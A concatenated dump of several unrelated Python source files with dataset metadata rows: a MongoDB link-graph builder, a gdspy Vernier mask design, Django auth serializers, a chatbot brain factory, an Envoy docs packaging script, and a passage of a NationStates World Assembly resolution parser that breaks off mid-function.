| 36.714286 | 116 | 0.66537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 173 | 0.673152 |
9edfcae85303a4e73d41bdae85aeda75e4c87673 | 2,817 | py | Python | scripts/wapo/wapo_link_graph_from_mongo.py | feup-infolab/army-ant | 7b33120d5160f73d7a41a05e6336489c917fb75c | [
"BSD-3-Clause"
]
| 5 | 2018-01-18T14:11:52.000Z | 2020-10-23T16:02:25.000Z | scripts/wapo/wapo_link_graph_from_mongo.py | feup-infolab/army-ant | 7b33120d5160f73d7a41a05e6336489c917fb75c | [
"BSD-3-Clause"
]
| 10 | 2018-02-02T20:19:36.000Z | 2020-10-05T08:46:36.000Z | scripts/wapo/wapo_link_graph_from_mongo.py | feup-infolab/army-ant | 7b33120d5160f73d7a41a05e6336489c917fb75c | [
"BSD-3-Clause"
]
| null | null | null | #!/usr/bin/env python
#
# wapo_link_graph_from_mongo.py
# José Devezas <[email protected]>
# 2019-02-05
import logging
import sys
import warnings
import networkx as nx
from bs4 import BeautifulSoup
from pymongo import MongoClient
logging.basicConfig(
format='%(asctime)s wapo_link_graph_from_mongo: %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO)
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) < 3:
print("Usage: %s MONGO_DBNAME OUTPUT_GRAPH_PATH" % sys.argv[0])
sys.exit(1)
database = sys.argv[1]
output_graph_path = sys.argv[2]
mongo = MongoClient()
db = mongo[database]
def document_iterator():
for doc in db.articles.find():
yield doc
for doc in db.blog_posts.find():
yield doc
logging.info("Extracting anchors from content elements (using article_url as node ID) and building graph")
g = nx.DiGraph()
doc_count = 0
edge_count = 0
attr_keys = ['id', 'title', 'article_url', 'published_date', 'author', 'type']
for source in document_iterator():
if not 'contents' in source or source.get('contents') is None:
continue
for par in source['contents']:
if par is None:
continue
html = par.get('content')
if html is None:
continue
html = str(html)
soup = BeautifulSoup(html, 'lxml')
anchors = soup.find_all('a')
for a in anchors:
target_url = a.attrs.get('href')
if target_url is None:
continue
query = {'article_url': target_url}
attr_selector = {
                '_id': 0, 'id': 1, 'article_url': 1, 'title': 1,  # 0 excludes _id from the projection
'published_date': 1, 'author': 1, 'type': 1}
target = db.articles.find_one(query, attr_selector) \
or db.blog_posts.find_one(query, attr_selector)
if target is None:
continue
# graph[source_url].add(target_url)
            g.add_node(
                source['id'], **{k.replace('_', ''): source[k] for k in attr_keys if source.get(k) is not None})
            g.add_node(
                target['id'], **{k.replace('_', ''): target[k] for k in attr_keys if target.get(k) is not None})
g.add_edge(source['id'], target['id'])
edge_count += 1
doc_count += 1
if doc_count % 1000 == 0:
logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count))
logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count))
logging.info("Saving graph to %s" % output_graph_path)
if output_graph_path.endswith('.gml') or output_graph_path.endswith('.gml.gz'):
nx.write_gml(g, output_graph_path)
else:
nx.write_graphml(g, output_graph_path)
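# Illustrative invocation (the database name and output path are assumptions):
#   python wapo_link_graph_from_mongo.py wapo wapo_links.graphml
# The resulting file can be loaded back with networkx, e.g.
#   g = nx.read_graphml('wapo_links.graphml')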
| 26.083333 | 108 | 0.615903 | 0 | 0 | 132 | 0.046842 | 0 | 0 | 0 | 0 | 704 | 0.249823 |
9ee566ce8a227cbd2a762122ce0690fc72e66ca6 | 7,540 | py | Python | designScripts/vernierMask.py | smartalecH/BYUqot | 5b24759c4a100086937795a80d2eb6597e611819 | [
"MIT"
]
| 5 | 2019-03-26T17:12:25.000Z | 2021-12-27T18:05:52.000Z | designScripts/vernierMask.py | smartalecH/BYUqot | 5b24759c4a100086937795a80d2eb6597e611819 | [
"MIT"
]
| 5 | 2018-05-30T21:05:36.000Z | 2018-08-16T05:16:40.000Z | designScripts/vernierMask.py | smartalecH/BYUqot | 5b24759c4a100086937795a80d2eb6597e611819 | [
"MIT"
]
| 5 | 2018-05-30T02:54:07.000Z | 2020-08-16T17:18:38.000Z | # ------------------------------------------------------------------ #
# vernierMask.py
# ------------------------------------------------------------------ #
#
# A mask design used to align the 3D printer to a silicon photonic chip
#
# ------------------------------------------------------------------ #
# VERSION HISTORY
# 10 Apr 2018 - AMH - Initialization
#
# ------------------------------------------------------------------ #
# ------------------------------------------------------------------ #
# Import libraries
# ------------------------------------------------------------------ #
# Get project library path to import library files
import sys
import os
d = os.path.dirname(os.getcwd())
libPath = os.path.abspath(os.path.join(d, 'lib'))
sys.path.insert(0, libPath)
# Import all other libraries
import gdspy
import numpy as np
import objectLibrary as obLib
# ------------------------------------------------------------------ #
# Design Constants
# ------------------------------------------------------------------ #
# Cell parameters
layerNumber = 1
# Vernier mask design parameters (all values in microns)
numFingers = 10 # Number of fingers to have on top and bottom
fingerWidth = 30 # Width of each finger
fingerSpacing = 40 # Spacing between fingers
longFingerLength = 200; # Length of the long, middle finger
shortFingerLength = 150; # Length of the short, outer fingers
baseThickness = 76; # Thickness of edge border of design
separationDistance = 380 # distance from edge of pattern to origin
buffer = 50 # Kerf width of blade
innerBoxWidth = 8.78e3 # Actual dimensions of chip
outerBoxWidth = innerBoxWidth + buffer # Buffered chip size
numCells = 12 # number of repeated cells in each dimension
# Now create a series of functions that return a cell. We'll leverage the recursive
# nature of GDS files to keep things simple.
# ------------------------------------------------------------------ #
# Create single Vernier pattern
# ------------------------------------------------------------------ #
def vernier():
# Intialize cell
vernierCell = gdspy.Cell('vernier')
# Calculate properties
vernierWidth = (longFingerLength + baseThickness)
vernierHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers
xCenter = -(vernierWidth/2 - baseThickness)
# First, place the long finger in the middle
vernierCell.add(gdspy.Rectangle([xCenter, -fingerWidth/2],
[xCenter+longFingerLength, fingerWidth/2],layer=layerNumber))
# Next, iterate through and place the other fingers
for k in range(1,numFingers+1):
# Add top fingers
vernierCell.add(gdspy.Rectangle(
[xCenter, fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1)],
[xCenter+shortFingerLength,fingerWidth/2 + fingerSpacing*k +fingerWidth*k],
layer=layerNumber))
# Add bottom fingers
vernierCell.add(gdspy.Rectangle(
[xCenter, -(fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1))],
[xCenter+shortFingerLength,-(fingerWidth/2 + fingerSpacing*k +fingerWidth*k)],
layer=layerNumber))
# Finally, add the edge
baseHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers
vernierCell.add(gdspy.Rectangle([-vernierWidth/2, baseHeight/2],
[xCenter, -baseHeight/2],layer=layerNumber))
# Now let's flatten
vernierCell.flatten()
# Return the cell
return vernierCell
# ------------------------------------------------------------------ #
# Create 2D Vernier pattern from single pattern
# ------------------------------------------------------------------ #
def vernier2D():
# Intialize 2D cell
vernier2DCell = gdspy.Cell('vernier2D')
# Initialize 1D cell
vernierCell = vernier()
# Get vernier dimensions
vernierDims = vernierCell.get_bounding_box()
vernierWidth = abs(vernierDims[0,0] - vernierDims[1,0])
vernierHeight = abs(vernierDims[0,1] - vernierDims[1,1])
# Place one Vernier pattern in the x direction
xCell = gdspy.CellReference(vernierCell,rotation=-90)
xCell.translate(-(vernierHeight/2 + separationDistance),-vernierWidth/2)
vernier2DCell.add(xCell)
# Place another Vernier pattern in the y direction
yCell = gdspy.CellReference(vernierCell,rotation=180)
yCell.translate(-vernierWidth/2,-(vernierHeight/2 + separationDistance))
vernier2DCell.add(yCell)
# Return final cell
return vernier2DCell
# ------------------------------------------------------------------ #
# Create Box outline
# ------------------------------------------------------------------ #
def boxOutline():
# initialize cell
outlineCell = gdspy.Cell('outline')
# define an outer box
outerBox = gdspy.Rectangle([-outerBoxWidth/2,-outerBoxWidth/2],
[outerBoxWidth/2,outerBoxWidth/2],layer=layerNumber)
# define an inner box
innerBox = gdspy.Rectangle([-innerBoxWidth/2,-innerBoxWidth/2],
[innerBoxWidth/2,innerBoxWidth/2],layer=layerNumber)
# now subtract the two
outline = gdspy.fast_boolean(outerBox,innerBox,'xor',layer=layerNumber)
# update the cell
outlineCell.add(outline)
# return the cell
return outlineCell
# ------------------------------------------------------------------ #
# Create Single Chip
# ------------------------------------------------------------------ #
def vernierChip():
# Initialize cells
vernierChipCell = gdspy.Cell('vernierChip')
vernier2DCell = vernier2D()
boxOutlineCell = boxOutline()
# Add border first
vernierChipCell.add(gdspy.CellReference(boxOutlineCell,(0,0)))
chipDims = vernierChipCell.get_bounding_box()
chipWidth = abs(chipDims[0,0] - chipDims[1,0])
# Now iterate through placing corners
thetaPos = [45, 135, -135, -45]
thetaRot = [0, 90, 180, -90]
for k in range(0,4):
xPos = np.sign(np.cos(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2)
yPos = np.sign(np.sin(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2)
vernierChipCell.add(gdspy.CellReference(vernier2DCell,(xPos,yPos),rotation=thetaRot[k]))
# return cell
return vernierChipCell
# ------------------------------------------------------------------ #
# Tapeout entire wafer
# ------------------------------------------------------------------ #
def vernierMask():
# Initialize cells
vernierMaskCell = gdspy.Cell('vernierMask')
vernierChipCell = vernierChip()
# Get chip dimensions
chipDims = vernierChipCell.get_bounding_box()
chipWidth = abs(chipDims[0,0] - chipDims[1,0])
# Get mask center
center = (numCells * chipWidth) / 2
# Let's make an array
vernierMaskCell.add(gdspy.CellArray(
vernierChipCell, numCells, numCells, (chipWidth, chipWidth), (-center, -center)
))
# return final cell
return vernierMaskCell
# ------------------------------------------------------------------ #
# OUTPUT
# ------------------------------------------------------------------ #
vernierMask()
# Output the layout to a GDSII file (default to all created cells).
# Set the units we used to micrometers and the precision to nanometers.
filename = 'vernierMask.gds'
outPath = os.path.abspath(os.path.join(d, 'GDS/'+filename))
gdspy.write_gds(outPath, unit=1.0e-6, precision=1.0e-9)
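# Optional interactive preview (illustrative, assumes a desktop session with
# gdspy's built-in viewer; left commented out so the script stays non-interactive):
#   gdspy.LayoutViewer(cells=['vernierMask'])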
| 35.233645 | 96 | 0.554377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,327 | 0.441247 |
9ee57d6363120b9d54a9902e2243f9122d20af71 | 4,810 | py | Python | src/core/serializers.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
]
| 17 | 2019-05-11T22:15:34.000Z | 2022-03-26T22:45:33.000Z | src/core/serializers.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
]
| 390 | 2019-05-23T10:48:57.000Z | 2021-12-17T21:01:43.000Z | src/core/serializers.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
]
| 40 | 2019-05-21T14:41:57.000Z | 2021-01-30T13:39:38.000Z | from django.contrib.auth import get_user_model
from rest_auth.registration.serializers import (
RegisterSerializer as BaseRegisterSerializer,
)
from rest_auth.registration.serializers import (
SocialLoginSerializer as BaseSocialLoginSerializer,
)
from rest_auth.serializers import LoginSerializer as BaseLoginSerializer
from rest_auth.serializers import (
PasswordResetConfirmSerializer as BasePasswordResetConfirmSerializer,
)
from rest_auth.serializers import UserDetailsSerializer as BaseUserDetailsSerializer
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from core.models import Profile
# noinspection PyAbstractClass
class LoginSerializer(BaseLoginSerializer):
"""
Extends the default LoginSerializer in order to return
custom error messages
"""
def validate(self, attrs):
try:
return super().validate(attrs)
except serializers.ValidationError as ex:
ex.detail = "The email or password you entered is incorrect!"
raise ex
# noinspection PyAbstractClass
class PasswordResetConfirmSerializer(BasePasswordResetConfirmSerializer):
"""
Extends the default PasswordResetConfirmSerializer in order to return
custom error messages
"""
def validate(self, attrs):
try:
return super().validate(attrs)
except serializers.ValidationError as ex:
if "new_password2" in ex.detail:
ex.detail = ex.detail["new_password2"][0]
else:
ex.detail = "Could not reset password. Reset token expired or invalid."
raise ex
# noinspection PyAbstractClass
class CustomSocialLoginSerializer(BaseSocialLoginSerializer):
"""
Extends default SocialLoginSerializer to add additional details to some
failed login attempts
"""
def validate(self, attrs):
try:
res = super().validate(attrs)
return res
except ValidationError as ex:
if "User is already registered with this e-mail address." in ex.detail:
ex.detail[0] = (
"User is already registered with this e-mail address. "
"Please login using the form above."
)
raise ex
# noinspection PyAbstractClass
class RegisterSerializer(BaseRegisterSerializer):
email = serializers.EmailField(required=True)
password = serializers.CharField(write_only=True)
first_name = serializers.CharField(write_only=True)
last_name = serializers.CharField(write_only=True)
# legacy compat
zip = serializers.CharField(write_only=True, required=False)
zipcode = serializers.CharField(write_only=True, required=False)
# Overrides the default required password fields
password1 = None
password2 = None
def get_cleaned_data(self):
return {
"username": self.validated_data.get("email", ""),
"email": self.validated_data.get("email", ""),
# allauth uses password1 internally for creation
"password1": self.validated_data.get("password", ""),
"first_name": self.validated_data.get("first_name", ""),
"last_name": self.validated_data.get("last_name", ""),
"zipcode": self.validated_data.get("zipcode", ""),
}
def validate(self, data):
return data
UserModel = get_user_model()
class ProfileSerializer(serializers.ModelSerializer):
class Meta:
model = Profile
fields = "__all__"
class UserDetailsSerializer(BaseUserDetailsSerializer):
profile = ProfileSerializer()
class Meta:
model = UserModel
fields = ("username", "email", "first_name", "last_name", "profile")
read_only_fields = ("email",)
def to_representation(self, instance: UserModel) -> dict:
"""Move fields from Profile to user representation."""
representation = super().to_representation(instance)
profile = representation.pop("profile")
representation["zipcode"] = profile["zipcode"]
representation["is_mentor"] = profile["is_mentor"]
return representation
class UserSerializer(BaseUserDetailsSerializer):
profile = ProfileSerializer()
class Meta:
model = UserModel
fields = ("username", "email", "first_name", "last_name", "profile")
read_only_fields = ("email",)
def to_representation(self, instance: UserModel) -> dict:
"""Move fields from Profile to user representation."""
representation = super().to_representation(instance)
profile = representation.pop("profile")
profile.pop("user")
for key, val in profile.items():
representation[key] = val
return representation
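
# Illustrative use of the registration serializer (field values below are
# assumptions, not fixtures from this project):
#   serializer = RegisterSerializer(data={
#       "email": "[email protected]", "password": "correct-horse-battery",
#       "first_name": "Ada", "last_name": "Lovelace", "zipcode": "60601",
#   })
#   serializer.is_valid(raise_exception=True)
#   cleaned = serializer.get_cleaned_data()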
| 33.172414 | 88 | 0.677755 | 3,983 | 0.828067 | 0 | 0 | 0 | 0 | 0 | 0 | 1,256 | 0.261123 |
9ee5da5b7c789afc93423e16612fb9f6de97baba | 3,519 | py | Python | src/programy/brainfactory.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
]
| null | null | null | src/programy/brainfactory.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
]
| null | null | null | src/programy/brainfactory.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
]
| 4 | 2019-04-01T15:42:23.000Z | 2020-11-05T08:14:27.000Z | """
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.brain import Brain
from programy.utils.classes.loader import ClassLoader
from abc import abstractmethod, ABCMeta
class BrainSelector(object):
__metaclass__ = ABCMeta
def __init__(self, configuration):
self._configuration = configuration
@abstractmethod
def select_brain(self, brains):
raise NotImplementedError()
class DefaultBrainSelector(BrainSelector):
def __init__(self, configuration, brains):
BrainSelector.__init__(self, configuration)
self._brains = brains
self._iterator = None
self._set_iterator()
def _set_iterator(self):
if self._brains:
self._iterator = iter(self._brains.values())
def select_brain(self):
try:
if self._iterator:
return next(self._iterator)
except StopIteration:
self._set_iterator()
try:
if self._iterator:
return next(self._iterator)
except StopIteration:
pass
return None
class BrainFactory(object):
def __init__(self, bot):
self._brains = {}
self._brain_selector = None
self.loads_brains(bot)
self.load_brain_selector(bot.configuration)
def brainids(self):
return self._brains.keys()
def brain(self, id):
if id in self._brains:
return self._brains[id]
else:
return None
def loads_brains(self, bot):
for config in bot.configuration.configurations:
brain = Brain(bot, config)
self._brains[brain.id] = brain
def load_brain_selector(self, configuration):
if configuration.brain_selector is None:
self._brain_selector = DefaultBrainSelector(configuration, self._brains)
else:
try:
self._brain_selector = ClassLoader.instantiate_class(configuration.brain_selector)(configuration, self._brains)
except Exception as e:
self._brain_selector = DefaultBrainSelector(configuration, self._brains)
def select_brain(self):
return self._brain_selector.select_brain()
def get_question_counts(self):
brains = []
for brainid, brain in self._brains.items():
brains.append({"id": brainid,
"questions": brain.num_questions})
return brains
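
# Hedged usage sketch: `bot` stands for a client object exposing `configuration`
# (with `configurations` and `brain_selector`), as the constructor above expects.
#   factory = BrainFactory(bot)
#   brain = factory.select_brain()
#   counts = factory.get_question_counts()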
| 34.165049 | 127 | 0.680591 | 2,282 | 0.64848 | 0 | 0 | 87 | 0.024723 | 0 | 0 | 1,114 | 0.316567 |
9ee68cd6efba5b094a83a85c60acb1031a826384 | 2,050 | py | Python | tools/docs/generate_api_rst.py | dcillera/envoy | cb54ba8eec26f768f8c1ae412113b07bacde7321 | [
"Apache-2.0"
]
| 17,703 | 2017-09-14T18:23:43.000Z | 2022-03-31T22:04:17.000Z | tools/docs/generate_api_rst.py | dcillera/envoy | cb54ba8eec26f768f8c1ae412113b07bacde7321 | [
"Apache-2.0"
]
| 15,957 | 2017-09-14T16:38:22.000Z | 2022-03-31T23:56:30.000Z | tools/docs/generate_api_rst.py | dcillera/envoy | cb54ba8eec26f768f8c1ae412113b07bacde7321 | [
"Apache-2.0"
]
| 3,780 | 2017-09-14T18:58:47.000Z | 2022-03-31T17:10:47.000Z | import os
import shutil
import sys
import tarfile
def include_package(envoy_api_protos, rst_file_path, prefix):
# `envoy_api_rst_files` is a list of file paths for .proto.rst files
# generated by protodoc
#
# we are only interested in the proto files generated for envoy protos,
# not for non-envoy dependencies
if ("pkg/" + prefix) not in rst_file_path:
return None
# derive the "canonical" path from the filepath
canonical = f"{rst_file_path.split('pkg/' + prefix)[1]}"
# we are only interested in the actual v3 protos, not their dependencies
if (prefix + canonical) not in envoy_api_protos:
return None
return canonical
def main():
proto_srcs = sys.argv[1]
envoy_api_rst_files = sys.argv[1:-1]
output_filename = sys.argv[-1]
with open(proto_srcs) as f:
# the contents of `proto_srcs` are the result of a bazel genquery,
# containing bazel target rules, eg:
#
# @envoy_api//envoy/watchdog/v3:abort_action.proto
#
# this transforms them to a list with a "canonical" form of:
#
# envoy/watchdog/v3/abort_action.proto.rst
#
envoy_api_protos = [
f"{src.split('//')[1].replace(':', '/')}.rst" for src in f.read().split("\n") if src
]
for rst_file_path in envoy_api_rst_files:
canonical = include_package(envoy_api_protos, rst_file_path, "envoy/")
if canonical is None:
canonical = include_package(envoy_api_protos, rst_file_path, "contrib/envoy/")
if canonical is None:
continue
target = os.path.join("rst-out/api-v3", canonical)
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
shutil.copy(rst_file_path, target)
# output the generated rst files to a tarfile for consumption
# by other bazel rules
with tarfile.open(output_filename, "w") as tar:
tar.add("rst-out", arcname=".")
if __name__ == "__main__":
main()
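# Illustrative manual invocation (in the real build Bazel supplies these paths;
# the file names here are assumptions):
#   python generate_api_rst.py proto_srcs.txt \
#       bazel-bin/pkg/envoy/watchdog/v3/abort_action.proto.rst api_rst.tar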
| 32.03125 | 96 | 0.642927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 823 | 0.401463 |
9ee7307b78f857465fe941638e5a41dd83ec835a | 15,792 | py | Python | src/wa_parser.py | ifly6/NS-WA-Authorboards | 57921457795306867844a29cdfce88bfcdd1c3f6 | [
"Apache-2.0"
]
| null | null | null | src/wa_parser.py | ifly6/NS-WA-Authorboards | 57921457795306867844a29cdfce88bfcdd1c3f6 | [
"Apache-2.0"
]
| null | null | null | src/wa_parser.py | ifly6/NS-WA-Authorboards | 57921457795306867844a29cdfce88bfcdd1c3f6 | [
"Apache-2.0"
]
| null | null | null | # Copyright (c) 2020 ifly6
import html
import io
import re
from datetime import datetime
from functools import cache
from typing import Tuple
import numpy as np
import pandas as pd
import requests
from bs4 import BeautifulSoup
from lxml import etree
from pytz import timezone
from ratelimit import limits, sleep_and_retry
from helpers import ref
from src import wa_cacher
""" Imperium Anglorum:
This is adapted from proprietary InfoEurope code which in part does most of this already. Eg the proposal portions
which translate, the locality adjustments, API reading, etc. There is also code in beta (not-in-production)
which would have done this entirely, but I never got around to developing the VIEWS for that portion of the website.
It seems much easier just to commit something like this given that all the code is already present.
See ifly6.no-ip.org for more information. """
_headers = {
'User-Agent': 'WA parser (Auralia; Imperium Anglorum)'
}
class ApiError(Exception):
pass
@sleep_and_retry
@limits(calls=25, period=30) # 50 calls every 30 seconds they say but somehow this is fake news
def call_api(url) -> str:
response = requests.get(url, headers=_headers)
if response.status_code != 200:
raise ApiError('{} error at api url: {}'.format(response.status_code, str(url)))
return response.text
def clean_chamber_input(chamber):
""" Turns ambiguous chamber information into tuple (int, str) with chamber id and chamber name """
if type(chamber) == str:
if chamber == '1':
chamber = 1
elif chamber == '2':
chamber = 2
elif chamber == 'GA':
chamber = 1
elif chamber == 'SC':
chamber = 2
chamber_name = 'GA' if chamber == 1 else \
'SC' if chamber == 2 else ''
return chamber, chamber_name
def localised(dt: 'datetime', tz='US/Eastern'):
return timezone(tz).localize(dt)
@cache
def _category_map():
d = {'Advancement of Industry': 'Environmental Deregulation',
'Civil Rights': 'Mild',
'Human Rights': 'Mild',
'Education and Creativity': 'Artistic',
'Environmental': 'Automotive',
'Free Trade': 'Mild',
'Furtherment of Democracy': 'Mild',
'Global Disarmament': 'Mild',
'Health': 'Healthcare',
'International Security': 'Mild',
'Moral Decency': 'Mild',
'Political Stability': 'Mild',
'Regulation': 'Consumer Protection',
'Gun Control': 'Tighten',
'Social Justice': 'Mild'}
return {ref(k): v for k, v in d.items()} # force ref name for matching
# nb that this is identical to dict( ( ref(k), v ) for k, v in d.items() )
def _translate_category(category: str, s: str) -> Tuple[bool, str]:
if ref(category) in _category_map() and s == '0':
return True, _category_map()[ref(category)] # yield correct name from ref name of category
# if it isn't 0, then it doesn't apply, return given
# if not in the list, return given
return False, s
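
# Illustrative behaviour (assuming helpers.ref normalises to a lower-case
# reference name): _translate_category('Environmental', '0') -> (True, 'Automotive'),
# while any strength other than '0' is passed through unchanged.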
def capitalise(s):
s = s.replace('_', ' ').strip()
# exceptions
capitalisation_exceptions = wa_cacher.load_capitalisation_exceptions()
for i in capitalisation_exceptions:
if s.strip().lower() == i.strip().lower():
return i # replace with manual correction
# only capitalise words longer than 2 letters ('new') and always capitalise first
# unless the word is in given list
# > fanboys & the
s = " ".join(
w.capitalize()
if (len(w) > 2 and w not in ['for', 'and', 'nor', 'but', 'yet', 'the']) or (i == 0)
else w
for i, w in enumerate(s.split())
).strip() # avoid apostrophe capitalisations
# but capitalise st -> St
for exception in ['St']:
s = ' '.join((exception if w.lower() == exception.lower() else w)
for w in s.split())
# for split in ['-']:
# # as first should always be capitalised, not checking doesn't matter
# s = split.join(w[:1].upper() + w[1:] for i, w in enumerate(s.split(split))) # capitalise first letter only
# "Christian DeMocrats"
# python str.capitalize forces all other chars to lower
# don't use str.capitalize above
for numeral in ['ii', 'iii', 'iv', 'v', 'vi', 'vii', 'viii', 'ix', 'x']:
s = re.sub(r'(?<=\s){}$'.format(numeral), numeral.upper(), s) # matches only trailing numerals
# people used to use WA missions; capitalise these, they are separate words
s = re.sub(r'(?<=\s)(Wa|wa|wA)(?=\s)', 'WA', s) # if between two spaces
s = re.sub(r'^(Wa|wa|wA)(?=\s)', 'WA', s) # if at start (eg WA Mission of NERV-UN)
return s
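
# Illustrative examples (assuming no overrides in the capitalisation exceptions
# file): capitalise('imperium_anglorum') -> 'Imperium Anglorum';
# capitalise('wa mission of nerv-un') -> 'WA Mission of Nerv-un'.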
def _get_council(i):
if i == 'GA' or i == 1: return 'GA'
if i == 'SC' or i == 2: return 'SC'
if i == 'UN' or i == 0: return 'UN'
raise ValueError(f'provided council code {i} is invalid')
class WaPassedResolution:
def __init__(self, **kwargs):
# core vote information
self.resolution_num = None
self.title = None
self.implementation = None
# category and strength
self.chamber = None
self.category = None
self.strength = None
# handle repeals
self.is_repealed = None
self.repealed_by = None
self.is_repeal = None
self.repeals = None
# text
self.text = None
# ancillary information
self.author = None
self.coauthor0 = None
self.coauthor1 = None
self.coauthor2 = None
self.votes_for = None
self.votes_against = None
self.council = None
self.__dict__.update(kwargs) # django does this automatically, i'm not updating it; lazy
@staticmethod
def parse_ga(res_num, council=1):
from src.wa_cacher import Cacher
try:
cacher = Cacher.load()
except FileNotFoundError:
cacher = Cacher() # init new
api_url = 'https://www.nationstates.net/cgi-bin/api.cgi?wa={}&id={}&q=resolution'.format(council, res_num)
in_cacher = cacher.contains(api_url)
if not in_cacher:
this_response = call_api(api_url)
cacher.update(api_url, this_response)
else:
this_response = cacher.get(api_url)
xml = etree.parse(io.StringIO(this_response))
if not xml.xpath('/WA/RESOLUTION/NAME'):
raise ValueError(f'resolution number {res_num} is invalid; no such resolution exists')
resolution_is_repealed = xml.xpath('/WA/RESOLUTION/REPEALED_BY') != []
resolution_is_a_repeal = xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID') != []
resolution_text = html.unescape(xml.xpath('/WA/RESOLUTION/DESC')[0].text)
resolution_author = xml.xpath('/WA/RESOLUTION/PROPOSED_BY')[0].text
print(resolution_author)
print(type(resolution_author))
if resolution_author is None or str(resolution_author).strip() == '':
raise RuntimeError('resolution author is empty')
author = capitalise(resolution_author)
resolution = WaPassedResolution(
council=_get_council(council),
resolution_num=res_num,
title=xml.xpath('/WA/RESOLUTION/NAME')[0].text,
implementation=localised(
datetime.utcfromtimestamp(int(xml.xpath('/WA/RESOLUTION/IMPLEMENTED')[0].text)),
'UTC'
).astimezone(timezone('US/Eastern')), # convert to eastern time
chamber=clean_chamber_input(xml.xpath('/WA/RESOLUTION/COUNCIL')[0].text)[1],
category=capitalise(xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text),
strength=capitalise(
_translate_category(
xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text, # category
xml.xpath('/WA/RESOLUTION/OPTION')[0].text # option
)[1] # get name
),
is_repealed=resolution_is_repealed,
repealed_by=int(xml.xpath('/WA/RESOLUTION/REPEALED_BY')[0].text) if resolution_is_repealed else None,
is_repeal=resolution_is_a_repeal,
repeals=int(xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID')[0].text) if resolution_is_a_repeal else None,
# text and author
text=resolution_text.strip(),
author=author.strip(),
# vote data
votes_for=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_FOR')[0].text),
votes_against=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_AGAINST')[0].text)
)
assert resolution.strength != '0', 'resolution {} has strength 0 with category {}'.format(
resolution.title, resolution.category
)
# overwrite category if repeal with the repeals field; NS API is broken sometimes for some reason
if resolution_is_a_repeal:
resolution.strength = str(int(resolution.repeals)) # cast to integer
# check for co-authors
coauth_list = xml.xpath('/WA/RESOLUTION/COAUTHOR/N')
if len(coauth_list) != 0:
print('received from API coauthors: {}'.format(
', '.join([capitalise(n.text) for n in coauth_list])
))
try:
resolution.coauthor0 = capitalise(coauth_list[0].text)
except IndexError:
pass
try:
resolution.coauthor1 = capitalise(coauth_list[1].text)
except IndexError:
pass
try:
resolution.coauthor2 = capitalise(coauth_list[2].text)
except IndexError:
pass
else:
cleaned_resolution_text = resolution_text \
.replace('[i]', '').replace('[/i]', '') \
.replace('[b]', '').replace('[/b]', '') \
.replace('[u]', '').replace('[/u]', '')
coauthor_matches = [s for s in cleaned_resolution_text.splitlines()
if re.search(
r'(Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:?)|'
r'(This resolution includes significant contributions made by\s+)',
s, re.IGNORECASE
)]
if len(coauthor_matches) > 0:
coauthor_line = re.sub(r'Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:? ', repl='',
string=coauthor_matches[0], flags=re.IGNORECASE)
print(f'\tidentified coauthor line: "{coauthor_line}"')
coauthor_line = coauthor_line \
.replace('[i]', '') \
.replace('[/i]', '') \
.replace('[b]', '') \
.replace('[/b]', '') \
.replace('[u]', '') \
.replace('[/u]', '')
if '[nation' in coauthor_line.lower(): # scion used the [Nation] tag instead of lower case once
amended_line = re.sub(r'(?<=\[nation)=(.*?)(?=\])', '', coauthor_line.lower()) # remove 'noflag' etc
coauthors = re.findall(r'(?<=\[nation\])(.*?)(?=\[/nation\])', amended_line.lower())
else:
# this will break with names like "Sch'tz and West Runk'land"
coauthors = re.split(r'(,? and )|(, )', coauthor_line, re.IGNORECASE)
coauthors = [i for i in coauthors if i is not None and i.strip() != 'and'] # post facto patching...
coauthors = [ref(s).replace('.', '') for s in coauthors] # cast to reference name
